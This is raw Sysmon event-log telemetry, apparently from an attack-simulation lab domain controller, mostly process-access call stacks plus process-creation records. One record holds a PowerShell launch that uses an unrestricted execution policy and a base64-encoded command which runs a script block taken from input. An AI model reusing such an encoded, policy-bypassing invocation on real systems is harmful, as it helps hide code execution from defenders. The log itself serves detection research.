13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-425D-6000-D502-000000009901}49324428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF9C790B68F) 154100x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.209{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ui20gj2w.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ui20gj2w.cmdline2021-01-14 13:08:46.199 11241100x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:08:46.199{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ui20gj2w.dll2021-01-14 13:08:46.199 10341000x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.809{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.809{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.809{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-425F-6000-DE02-000000009901}3792C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425F-6000-DE02-000000009901}3792C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.574{08A6967A-425F-6000-DD02-000000009901}27604720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425F-6000-DE02-000000009901}3792C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d2a2519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c743123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c742df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1f46d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c70398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c761e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7454be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7454be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c74534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7372d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c743807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7433fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c743123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c742df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1f46d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c729c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c729225(wow64) 154100x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.577{08A6967A-425F-6000-DE02-000000009901}3792C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 